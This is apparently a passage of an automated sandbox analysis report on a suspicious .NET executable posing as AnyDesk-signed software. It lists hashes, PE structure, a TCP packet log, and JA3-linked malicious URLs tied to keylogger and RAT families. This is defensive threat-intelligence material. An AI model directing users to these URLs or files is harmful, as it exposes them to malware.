                              https://geminiup-uuyc.top/Get hashmaliciousUnknownBrowse
                              • 188.114.96.3

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0eTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                              • 162.159.134.233
                              https://geminiqwc-sw.top/Get hashmaliciousUnknownBrowse
                              • 162.159.134.233
                              http://tiktok1688.cc/Get hashmaliciousUnknownBrowse
                              • 162.159.134.233
                              https://qwekorqw-eqo.top/Get hashmaliciousUnknownBrowse
                              • 162.159.134.233
                              https://qwoms-dei3.top/Get hashmaliciousUnknownBrowse
                              • 162.159.134.233
                              http://cmn.pkgu192.vip/Get hashmaliciousUnknownBrowse
                              • 162.159.134.233
                              http://frt.asan192.vip/Get hashmaliciousUnknownBrowse
                              • 162.159.134.233
                              https://tiktokshopxx.top/Get hashmaliciousUnknownBrowse
                              • 162.159.134.233
                              http://frt.msxd711.vip/Get hashmaliciousUnknownBrowse
                              • 162.159.134.233

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\450230549.exe.log

                              Download File
                              Process:C:\Users\user\Desktop\450230549.exe
                              File Type:Unknown
                              Category:dropped
                              Size (bytes):847
                              Entropy (8bit):5.345615485833535
                              Encrypted:false
                              SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                              MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                              SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                              SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                              SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                              Malicious:true
                              Reputation:moderate, very likely benign file
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):6.490515014251841
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              • Win32 Executable (generic) a (10002005/4) 49.96%
                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              File name:450230549.exe
                              File size:107'848 bytes
                              MD5:5086980f3ee0c035ec304102e6981410
                              SHA1:fca1625b36a002d77f69586f96744dfbcde1d472
                              SHA256:bfcef30ac8c0270957b3126d0b9046ddd4bc67fdffea077dd0a127809aa233a6
                              SHA512:baca4e5d7b1c7f4a7ddcf1ff2ba9876677a9ec43f5a4f6f985f55225b6d59ddb50bb7da1609a91b2ba389796e42407164111d9268dbc6a930f8b180da6d8e2c2
                              SSDEEP:1536:YPDs/XKdUDp1lRzloawwPI7zwHPG72uu630VDxl7Hxij7wPTxq:YP4b1lFLwM9PG720EVDxlQjcPU
                              TLSH:E5B34B166AC5D705D9E87EF860F7012217B2BDC61630C28B2DB8B7588E72393EDC566C
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....I.............................N.... ........@.. ....................................`................................

                              File Icon

                              Icon Hash:8f82989919951d01

                              Static PE Info

                              General

                              Entrypoint:0x40e74e
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0xA449B1F0 [Sat May 5 12:58:24 2057 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                              Authenticode Signature

                              Signature Valid:false
                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                              Signature Validation Error:The digital signature of the object did not verify
                              Error Number:-2146869232
                              Not Before, Not After
                              • 12/02/2024 00:00:00 12/02/2025 23:59:59
                              Subject Chain
                              • CN=AnyDesk Software GmbH, O=AnyDesk Software GmbH, L=Stuttgart, S=Baden-W\xfcrttemberg, C=DE
                              Version:3
                              Thumbprint MD5:E4E34304F4315A15A0BC0E413363721E
                              Thumbprint SHA-1:CA38CF219C8E9782A8CBBD76643D24E4F2D74B03
                              Thumbprint SHA-256:AF74DC88EF91477F8A93E5DA98B3C80ECD6CB6A10271DC6DC768EC3F34239BC0
                              Serial:030E330A8ED28347BDA3BB478E410D7C

                              Entrypoint Preview

                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xe7000x4b.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x120000x83e8.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x154000x5148
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1c0000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0xe6bf0x1c.text
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000xc7540xc800c094f9bd686d5b7b28df2388262d0f14False0.55212890625data6.171156178031321IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .sdata0x100000x1e80x200ba1a51c546597b8fdcb7d0154e4ab651False0.857421875data6.638446248926509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x120000x83e80x840037bfb2adf08a7790d9ce6bdcc9f0ae0cFalse0.2878196022727273data5.210626337188779IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x1c0000xc0x200c70b7482b129e12d54df7f5701eccbd1False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0x121c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.5487588652482269
                              RT_ICON0x126280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.37922138836772984
                              RT_ICON0x136d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.28060165975103735
                              RT_ICON0x15c780x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.25614076523382145
                              RT_GROUP_ICON0x19ea00x3edata0.7903225806451613
                              RT_VERSION0x19ee00x31cdata0.42839195979899497
                              RT_MANIFEST0x1a1fc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                              Imports

                              DLLImport
                              mscoree.dll_CorExeMain

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Sep 26, 2024 09:18:53.063005924 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.063055038 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.063131094 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.097182989 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.097204924 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.605844975 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.605990887 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.610922098 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.610938072 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.611340046 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.659261942 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.693247080 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.739401102 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.828139067 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.828355074 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.828408003 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.828422070 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.828552961 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.828603983 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.828609943 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.828756094 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.828811884 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.828818083 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.828917027 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.828974009 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.828979015 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.832915068 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.832976103 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.832982063 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.877991915 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.878005028 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.919140100 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.919244051 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.919253111 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.919379950 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.919434071 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.919440031 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.919611931 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.919681072 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.919687033 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.919785976 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.919841051 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.919846058 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.919974089 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.920022964 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.920027971 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.920517921 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.920577049 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.920581102 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.920635939 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.920665026 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.920684099 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.920692921 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.920734882 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.920825005 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.920890093 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.920937061 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.920955896 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.920962095 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.921005964 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.921010017 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.921665907 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.921700954 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.921725988 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.921732903 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:53.921777964 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:53.988008976 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.034240961 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.034249067 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.081114054 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.352169037 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.352369070 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.352425098 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.352442980 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.352570057 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.352619886 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.352631092 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.352675915 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.352735043 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.352741003 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.352812052 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.352818966 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.352844954 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.352874041 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.352936029 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.352998972 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.353004932 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.353051901 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.353051901 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.353072882 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.353120089 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.353168011 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.353233099 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.353266954 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.353324890 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.353370905 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.353420973 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.353528023 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.353640079 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.353646040 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.353672028 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.353693008 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.353707075 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.353728056 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.353873968 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.353933096 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.353939056 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.353982925 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.353984118 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.354006052 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.354044914 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.354095936 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.354157925 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.354162931 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.354192019 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.354212046 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.354217052 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.354239941 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.354299068 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.354357958 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.354362965 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.354389906 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.354415894 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.354422092 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.354444027 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.357009888 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.357079029 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.357084036 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.357136965 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.357477903 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.357544899 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.357573032 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.357639074 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.357711077 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.357774973 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.358278036 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.358342886 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.358378887 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.358437061 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.358478069 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.358536005 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.361936092 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.362008095 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.362131119 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.362206936 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.362541914 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.362606049 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.362637997 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.362700939 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.362754107 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.362814903 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.363466978 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.363526106 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.363667965 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.363729000 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.363759995 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.363856077 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.364473104 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.364547014 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.364583015 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.364665985 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.364763975 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.364830017 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.365514994 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.365576982 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.365735054 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.365803957 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.365847111 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.365902901 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.365932941 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.365991116 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.366619110 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.366678953 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.366740942 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.366792917 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.366862059 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.366918087 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.368752003 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.368769884 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.368813992 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.368829966 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.368839025 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.368887901 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.369906902 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.369952917 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.369982958 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.369988918 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.370017052 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.370044947 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.371017933 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.371062040 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.371097088 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.371103048 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.371124029 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.371153116 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.372107029 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.372148037 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.372199059 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.372204065 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.372232914 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.372260094 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.372699976 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.372756004 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.372795105 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.372800112 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.372826099 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.372858047 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.373260975 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.373316050 CEST44349731162.159.134.233192.168.2.4
